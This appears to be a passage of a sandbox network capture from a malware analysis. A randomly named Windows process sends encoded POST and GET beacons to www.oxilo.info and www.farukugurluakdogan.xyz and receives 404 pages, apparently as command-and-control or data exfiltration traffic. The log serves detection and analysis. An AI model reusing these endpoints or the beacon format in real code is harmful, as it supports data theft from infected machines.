Oct 15, 2024 16:21:27.313064098 CEST	1794	OUT	POST /ve3g/ HTTP/1.1 Host: www.oxilo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.oxilo.info Content-Length: 1244 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.oxilo.info/ve3g/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 44 52 30 75 73 4b 77 41 63 30 33 47 34 4e 66 72 50 6d 48 70 61 51 32 43 76 6b 49 6c 71 68 62 71 41 47 45 56 4d 53 6b 55 78 54 6e 71 6b 73 41 47 7a 6c 43 34 78 64 48 61 6f 4b 52 72 57 6b 34 76 42 55 4f 77 47 73 35 75 43 55 62 33 66 54 2f 48 31 57 74 53 43 6d 38 34 33 70 7a 58 57 31 78 64 5a 74 38 68 2b 70 4b 43 4b 43 72 36 31 66 79 58 61 64 55 42 71 72 51 78 46 45 5a 66 46 38 4a 57 52 74 37 50 49 65 69 77 47 56 65 37 57 34 6a 58 65 39 6f 4b 30 6b 65 62 49 6e 4a 67 33 30 6a 74 38 7a 63 70 51 38 64 72 38 39 52 42 39 53 37 59 78 51 54 2b 71 70 70 38 75 6f 56 48 2b 46 71 4b 2f 6e 59 43 30 4c 30 42 54 4d 79 6f 33 4a 41 69 79 42 72 4b 71 4f 34 49 36 57 48 6f 6e 56 30 2f 54 4c 63 71 46 4b 34 67 42 42 33 32 4a 4d 6b 4a 4a 46 61 56 77 4a 47 53 32 6d 4a 33 4d 47 68 6d 57 69 5a 33 64 4d 2f 6c 33 78 47 44 4d 69 45 4d 4c 4e 51 4d 57 64 4d 45 62 7a 44 4c 2f 6a 4a 73 56 32 51 4f 77 37 39 44 44 69 36 34 63 41 45 69 78 58 61 4a 7a 45 59 72 4d 31 54 53 71 6a 6e 4e 38 69 4d 73 48 68 78 78 76 4a 48 6a 63 53 [TRUNCATED] Data Ascii: K29=DR0usKwAc03G4NfrPmHpaQ2CvkIlqhbqAGEVMSkUxTnqksAGzlC4xdHaoKRrWk4vBUOwGs5uCUb3fT/H1WtSCm843pzXW1xdZt8h+pKCKCr61fyXadUBqrQxFEZfF8JWRt7PIeiwGVe7W4jXe9oK0kebInJg30jt8zcpQ8dr89RB9S7YxQT+qpp8uoVH+FqK/nYC0L0BTMyo3JAiyBrKqO4I6WHonV0/TLcqFK4gBB32JMkJJFaVwJGS2mJ3MGhmWiZ3dM/l3xGDMiEMLNQMWdMEbzDL/jJsV2QOw79DDi64cAEixXaJzEYrM1TSqjnN8iMsHhxxvJHjcSafxJ3SXPWKOIixhG0HBG+XPvpT1AilqKuobfZUJofuR8IzF0cS0/wCT0i+T8ubmaT4tPmEF87m0hE57Yrv8wHSz3SUB35JCU5pTm01LuaUEOm47tZ1YFXTQafCCX2ozgfMJUKo0jAatEDFYTza8f3CxlZDF7vpTkgVWaJcF8i0SvMKB1unRpHA5rBDr4e1PsX18oI700NoVnOR3Z0PAhP7P6wAmlOMrhN30He6BqYdbde3lhpovlQS42O/paO/FmQRkvt9tZUvsyNqAqNi7Q6dXpVYPLWeqMsyzqJWpqRdiM4TG7Tp2NLIeo7G1v0z3Ouq+hak2p1Lt35dpVtxGSnhx3pkkyRiHKHjnKzn3OXnCQomzouofWhtto+CgmxHJNq7F8aacuaZCDZIk1IuY3X3y71deXEGMSJOhR2al6ZPZjPmckwf1kq8UcxIsXpuU01onoB/EOXorTKXvUwMl9/3IJyD/MKDCj2YgUgRkvxyrhjzZb5IiTyN/6r5+KH2QrnSERlJZUs3UWm3rpvXKlokWvdmQ60hyy3AR+HErj4+T5b9lPpU9LzVOnqcVGPCZ71hwSfWC8Sd7G5d/dv70G3B4W2wvOpBGVj4t0qUD6ZM8dTaBY/VjjK2j4IHQTvk+Il3Jzp2VsMNmKZ7jg186zJ2tIveKXWLdO9j [TRUNCATED]
Oct 15, 2024 16:21:28.053348064 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 15 Oct 2024 14:21:27 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 16052 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Oct 15, 2024 16:21:28.053447008 CEST	1236	IN	Data Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
Oct 15, 2024 16:21:28.053468943 CEST	1236	IN	Data Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
Oct 15, 2024 16:21:28.054567099 CEST	1236	IN	Data Raw: 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlim
Oct 15, 2024 16:21:28.054588079 CEST	848	IN	Data Raw: 20 2d 32 2e 35 30 30 31 34 39 2c 31 34 2e 33 33 33 34 33 20 2d 30 2e 31 36 36 37 35 39 2c 34 2e 35 30 30 36 32 20 30 2e 33 33 33 31 32 34 2c 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c Data Ascii: -2.500149,14.33343 -0.166759,4.50062 0.333124,8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323"
Oct 15, 2024 16:21:28.055423021 CEST	1236	IN	Data Raw: 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f Data Ascii: inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16
Oct 15, 2024 16:21:28.055442095 CEST	1236	IN	Data Raw: 20 63 20 32 2e 39 31 36 36 33 37 2c 31 30 2e 34 32 39 33 37 20 35 2e 38 33 33 34 35 38 2c 32 30 2e 38 35 39 34 20 37 2e 32 39 31 39 36 34 2c 32 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c Data Ascii: c 2.916637,10.42937 5.833458,20.8594 7.291964,26.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.
Oct 15, 2024 16:21:28.055458069 CEST	424	IN	Data Raw: 35 2c 31 37 2e 35 36 33 33 39 20 30 2e 34 31 32 36 31 37 2c 31 32 2e 35 35 35 34 38 20 31 2e 33 35 35 30 36 34 2c 33 34 2e 39 33 38 35 39 20 32 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 Data Ascii: 5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stro
Oct 15, 2024 16:21:28.056606054 CEST	1236	IN	Data Raw: 36 31 34 34 31 34 2c 31 39 2e 37 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 Data Ascii: 614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:no
Oct 15, 2024 16:21:28.056626081 CEST	1236	IN	Data Raw: 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 Data Ascii: join:miter;stroke-opacity:1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;s
Oct 15, 2024 16:21:28.058805943 CEST	1236	IN	Data Raw: 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 Data Ascii: "opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	53142	162.0.213.94	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:29.853645086 CEST	507	OUT	GET /ve3g/?K29=OTcOv8w+bCTLwtzbPVHaVBaVlmgm7BOGOBYyNnUD5x742Zgn72+Avt/ao6tsWGE5AAzMA+xeSHuleySgj3Ruf3ZwlqvIEjNxSel8keC2Xwb1w7P8UoRCloIeFUJhKKlSUKrICZ0=&ahL=jjndrjuPIn2hz HTTP/1.1 Host: www.oxilo.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 15, 2024 16:21:30.560199022 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 15 Oct 2024 14:21:30 GMT Server: Apache X-Frame-Options: SAMEORIGIN Content-Length: 16052 X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Oct 15, 2024 16:21:30.560417891 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 Data Ascii: style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="
Oct 15, 2024 16:21:30.560431004 CEST	1236	IN	Data Raw: 2e 33 33 65 2d 34 20 2d 30 2e 37 38 31 39 38 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 Data Ascii: .33e-4 -0.78198,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-wi
Oct 15, 2024 16:21:30.561326027 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 78 3d 22 33 35 2e 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 Data Ascii: x="35.355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;
Oct 15, 2024 16:21:30.561342001 CEST	1236	IN	Data Raw: 2d 32 2e 33 33 33 33 39 2c 39 2e 38 33 32 38 20 2d 32 2e 35 30 30 31 34 39 2c 31 34 2e 33 33 33 34 33 20 2d 30 2e 31 36 36 37 35 39 2c 34 2e 35 30 30 36 32 20 30 2e 33 33 33 31 32 34 2c 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e Data Ascii: -2.33339,9.8328 -2.500149,14.33343 -0.166759,4.50062 0.333124,8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.3
Oct 15, 2024 16:21:30.562354088 CEST	1236	IN	Data Raw: 37 2e 37 34 39 37 34 20 34 2e 36 38 32 30 35 2c 31 30 2e 39 31 33 38 34 20 30 2e 37 36 35 34 32 2c 33 2e 31 36 34 31 20 31 2e 34 30 31 32 39 2c 36 2e 35 30 32 34 32 20 31 2e 36 39 37 38 31 2c 38 2e 30 32 34 30 36 20 30 2e 32 39 36 35 31 2c 31 2e Data Ascii: 7.74974 4.68205,10.91384 0.76542,3.1641 1.40129,6.50242 1.69781,8.02406 0.29651,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;str
Oct 15, 2024 16:21:30.562366962 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 Data Ascii: style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235
Oct 15, 2024 16:21:30.563327074 CEST	1236	IN	Data Raw: 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34 33 37 34 37 20 2d 39 2e 36 31 34 34 31 34 2c 31 39 2e 37 34 36 37 32 20 2d 31 31 2e 39 31 32 38 30 38 2c 32 36 2e 37 Data Ascii: 23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,5
Oct 15, 2024 16:21:30.563338995 CEST	1236	IN	Data Raw: 2d 77 69 64 74 68 3a 31 2e 30 30 36 31 34 31 35 34 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f Data Ascii: -width:1.00614154px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display
Oct 15, 2024 16:21:30.564321041 CEST	1236	IN	Data Raw: 32 32 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 Data Ascii: 224" id="path4565" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path tra
Oct 15, 2024 16:21:30.565556049 CEST	1236	IN	Data Raw: 34 31 33 38 20 2d 30 2e 34 32 39 36 35 2c 33 2e 32 38 31 39 37 20 30 2e 32 38 34 38 34 2c 33 2e 39 36 33 35 31 20 30 2e 37 31 34 34 39 2c 30 2e 36 38 31 35 35 20 32 2e 33 35 33 39 36 2c 30 2e 33 39 39 39 39 20 33 2e 39 39 34 31 38 2c 30 2e 31 31 Data Ascii: 4138 -0.42965,3.28197 0.28484,3.96351 0.71449,0.68155 2.35396,0.39999 3.99418,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	53143	85.159.66.93	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:35.825145006 CEST	793	OUT	POST /mx00/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.farukugurluakdogan.xyz Content-Length: 208 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.farukugurluakdogan.xyz/mx00/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 6e 67 4e 2b 57 63 41 78 57 46 39 34 65 68 32 4b 64 2b 78 45 53 4b 72 52 4d 38 64 6b 37 49 33 58 42 6d 4c 71 43 73 58 49 70 4a 56 65 57 41 69 2b 53 56 34 48 5a 41 39 2f 6d 71 48 66 4e 34 69 72 67 4c 44 6f 38 59 61 4b 37 30 4d 49 58 2f 32 58 4d 44 4a 36 68 31 44 32 7a 67 65 4b 77 71 5a 68 7a 6d 34 58 68 57 53 42 6b 6d 51 65 50 45 61 37 62 46 6c 2f 45 45 37 62 77 30 4f 32 48 48 6b 63 6b 33 34 52 39 30 79 79 70 38 32 47 6c 4d 78 75 64 49 36 5a 65 64 79 4c 4b 52 54 53 73 4c 48 46 64 72 61 50 52 56 4e 35 6f 30 6d 44 6b 39 51 45 46 43 57 51 42 4b 75 62 67 48 63 61 46 56 75 61 6c 74 45 55 39 4b 42 64 48 61 34 5a Data Ascii: K29=ngN+WcAxWF94eh2Kd+xESKrRM8dk7I3XBmLqCsXIpJVeWAi+SV4HZA9/mqHfN4irgLDo8YaK70MIX/2XMDJ6h1D2zgeKwqZhzm4XhWSBkmQePEa7bFl/EE7bw0O2HHkck34R90yyp82GlMxudI6ZedyLKRTSsLHFdraPRVN5o0mDk9QEFCWQBKubgHcaFVualtEU9KBdHa4Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	53144	85.159.66.93	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:38.373410940 CEST	817	OUT	POST /mx00/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.farukugurluakdogan.xyz Content-Length: 232 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.farukugurluakdogan.xyz/mx00/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 6e 67 4e 2b 57 63 41 78 57 46 39 34 65 42 6d 4b 52 39 5a 45 55 71 72 65 52 4d 64 6b 75 59 33 74 42 6d 48 71 43 75 37 59 71 37 68 65 54 51 53 2b 54 55 34 48 61 41 39 2f 74 4b 48 61 4a 34 69 67 67 4c 4f 49 38 61 65 4b 37 30 6f 49 58 2b 47 58 5a 69 4a 6c 67 6c 44 4f 31 67 65 49 6f 4b 5a 68 7a 6d 34 58 68 57 75 72 6b 6d 59 65 4f 30 4b 37 61 6b 6c 38 4e 6b 37 61 35 55 4f 32 44 48 6b 51 6b 33 35 30 39 78 53 63 70 2f 65 47 6c 4a 56 75 64 5a 36 61 56 64 79 42 4f 52 53 74 6c 4b 65 37 64 6f 76 69 66 48 46 55 39 30 4b 43 73 72 52 65 5a 78 57 7a 54 61 4f 5a 67 46 45 6f 46 31 75 77 6e 74 38 55 76 64 4e 36 49 75 64 36 58 31 78 67 53 44 4b 34 4d 30 42 2b 30 70 50 2f 71 50 4c 35 71 77 3d 3d Data Ascii: K29=ngN+WcAxWF94eBmKR9ZEUqreRMdkuY3tBmHqCu7Yq7heTQS+TU4HaA9/tKHaJ4iggLOI8aeK70oIX+GXZiJlglDO1geIoKZhzm4XhWurkmYeO0K7akl8Nk7a5UO2DHkQk3509xScp/eGlJVudZ6aVdyBORStlKe7dovifHFU90KCsrReZxWzTaOZgFEoF1uwnt8UvdN6Iud6X1xgSDK4M0B+0pP/qPL5qw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	53145	85.159.66.93	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
